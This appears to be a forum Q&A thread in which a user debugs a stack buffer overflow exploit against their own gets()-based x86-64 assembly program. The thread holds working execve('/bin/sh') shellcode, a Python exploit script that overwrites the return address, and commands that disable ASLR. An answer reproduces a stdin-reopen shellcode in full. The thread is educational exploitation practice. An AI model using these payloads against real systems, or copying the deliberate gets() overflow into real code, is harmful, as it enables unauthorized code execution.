I played around with buffer overflows on Linux (amd64) and tried exploiting a simple program, but it failed. I disabled the security features (address space layout randomization with sysctl -w kernel.randomize_va_space=0 and nx bit in the bios). It jumps to the stack and executes the shellcode, but it doesn't start a shell. The execve syscall succeeds but afterwards it just terminates. Any idea what's wrong? Running the shellcode standalone works just fine.

Bonus question: Why do I need to set rax to zero before calling printf? (See comment in the code)

Vulnerable file buffer.s:

.string "Stackpointer %p\n"
.string "Jump to %p\n"
.global main
    push %rbp
    mov %rsp, %rbp

    sub $120,  %rsp

    # calling printf without setting rax
    # to zero results in a segfault. why?
    xor %rax, %rax 
    mov %rsp, %rsi
    mov $.fmtsp, %rdi
    call printf

    mov %rsp, %rdi
    call gets

    xor %rax, %rax
    mov $.fmtjump, %rdi
    mov 8(%rbp), %rsi
    call printf

    xor %rax, %rax


.global main
    mov $0x68732f6e69622fff, %rbx
    shr $0x8, %rbx
    push %rbx
    mov %rsp, %rdi
    xor %rsi, %rsi
    xor %rdx, %rdx
    xor %rax, %rax
    add $0x3b, %rax


shellcode = "\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x48\x83\xc0\x3b\x0f\x05"
stackpointer = "\x7f\xff\xff\xff\xe3\x28"
output = shellcode
output += 'a' * (120 - len(shellcode)) # fill buffer
output += 'b' * 8 # override stored base pointer
output += ''.join(reversed(stackpointer))
print output

Compiled with:

$ gcc -o buffer buffer.s
$ gcc -o shellcode shellcode.s

Started with:

$ python exploit.py | ./buffer
Stackpointer 0x7fffffffe328
Jump to 0x7fffffffe328

Debugging with gdb:

$ python exploit.py > exploit.txt (Note: corrected stackpointer address in exploit.py for gdb)
$ gdb buffer
(gdb) run < exploit.txt
Starting program: /home/henning/bo/buffer < exploit.txt
Stackpointer 0x7fffffffe308
Jump to 0x7fffffffe308
process 4185 is executing new program: /bin/dash

Program exited normally.
  • I suppose %rsi% is argv. Can it be NULL?
    – Aryabhatta
    May 18, 2010 at 16:50
  • Executing shellcode directly ("$ ./shellcode") works, so I assume that it should be no problem. The C equivalent #include <stdlib.h> void main() { execve("/bin/sh", NULL, NULL); } starts a shell too.
    – henning
    May 18, 2010 at 17:18
  • What is the error you get? Were you able to figure that out (I suppose it is %rax%)?
    – Aryabhatta
    May 18, 2010 at 17:32
  • My first guess (syscall fails) was wrong. According to gdb it starts /bin/dash but terminates directly afterwards. See edited question. Thanks for your help so far.
    – henning
    May 19, 2010 at 9:40

2 Answers 2


I'm having pretty much the same problem right now with Ubuntu 9.10 in a VM. Disabled all the security measurements of the OS, and simple exploits like "exit the program and set exit-code to 42" do work, but when trying to open a shell, the program just terminates. Output of gdb is identical:

(gdb) run < exploit.0xbffff3b8 
Starting program: /home/seminar/ubung/target/client < exploit.0xbffff3b8

Enter password: Sorry. Wrong password.
Executing new program: /bin/bash

Program exited normally.

Thing is, I need it working in approx. 16 hours for a presentation :-D

Update: I found this neat study: www.shell-storm.org/papers/files/539.pdf

On page 16 it says: "If we try to execute a shell, it terminates immediately in this configuration"

In other examples that don't use gets(), they do very well spawn a shell. Unfortunately, they don't give a hint on WHY it doesn't work that way. :(

Next Update: It seems it has to do with stdin. The shell cannot properly use the one it gets from the original process. I tried using a minimal shell I found the sourcecode for (evilsh). It crashed at the point where it tried to read input. My guess is, that bash/dash checks for this and just silently exits when something is wrong with stdin.

Ok please don't kill me for having this conversation with myself here, but...

I found a solution!

For some reason it is necessary to reopen the inputs. I found a working shellcode here:


I don't see a prompt tough, but I can run programs etc. using the shell that opens.

  • 3
    In my humble opinion, the stdin must be reopened in the shellcode because the shell reads the "end-of-file" from exploit.txt from the shared stdin. To put in another way, when the shell begins, the buffer of stdin contains "end-of-file" because the stdin is shared between the shell and the original program.
    – feirainy
    Mar 13, 2014 at 1:38
  • 2
    The milw0rm link is now dead, but exploitdb has a similar exploit which you can find here: exploit-db.com/exploits/13357 credit to this post for discovering this mattandreko.com/2011/12/17/exploit-exercises-protostar-stack-5
    – Derwent
    May 19, 2018 at 1:14

The link provided by Zenoc is dead, but can still be found in the Wayback machine. For convenience, I've reproduced it below. I had to include add $0x10,%esp at the top to give me more stack space, as all the pushes in the code ate into the buffer where my shellcode was stored. If you'd like to include that to the shellcode too, just add "\x83\xc4\x10" to the start. The shellcode is 55 bytes without my addition, and 58 with.

 * $Id: gets-linux.c,v 1.3 2004/06/02 12:22:30 raptor Exp $
 * gets-linux.c - stdin re-open shellcode for Linux/x86
 * Copyright (c) 2003 Marco Ivaldi <raptor@0xdeadbeef.info>
 * Local shellcode for stdin re-open and /bin/sh exec. It closes stdin 
 * descriptor and re-opens /dev/tty, then does an execve() of /bin/sh.
 * Useful to exploit some gets() buffer overflows in an elegant way...

 * close(0) 
 * 8049380:       31 c0                   xor    %eax,%eax
 * 8049382:       31 db                   xor    %ebx,%ebx
 * 8049384:       b0 06                   mov    $0x6,%al
 * 8049386:       cd 80                   int    $0x80
 * open("/dev/tty", O_RDWR | ...)
 * 8049388:       53                      push   %ebx
 * 8049389:       68 2f 74 74 79          push   $0x7974742f
 * 804938e:       68 2f 64 65 76          push   $0x7665642f
 * 8049393:       89 e3                   mov    %esp,%ebx
 * 8049395:       31 c9                   xor    %ecx,%ecx
 * 8049397:       66 b9 12 27             mov    $0x2712,%cx
 * 804939b:       b0 05                   mov    $0x5,%al
 * 804939d:       cd 80                   int    $0x80
 * execve("/bin/sh", ["/bin/sh"], NULL)
 * 804939f:       31 c0                   xor    %eax,%eax
 * 80493a1:       50                      push   %eax
 * 80493a2:       68 2f 2f 73 68          push   $0x68732f2f
 * 80493a7:       68 2f 62 69 6e          push   $0x6e69622f
 * 80493ac:       89 e3                   mov    %esp,%ebx
 * 80493ae:       50                      push   %eax
 * 80493af:       53                      push   %ebx
 * 80493b0:       89 e1                   mov    %esp,%ecx
 * 80493b2:       99                      cltd   
 * 80493b3:       b0 0b                   mov    $0xb,%al
 * 80493b5:       cd 80                   int    $0x80

char sc[] = 

    int (*f)() = (int (*)())sc; f();

// milw0rm.com [2006-07-20]

Note: I couldn't add this as an edit to Zenoc's answer because the edit queue is full.

If you are having trouble pinpointing the address of your shellcode due to differing stacks in the terminal and gdb, have a look at my answer here.

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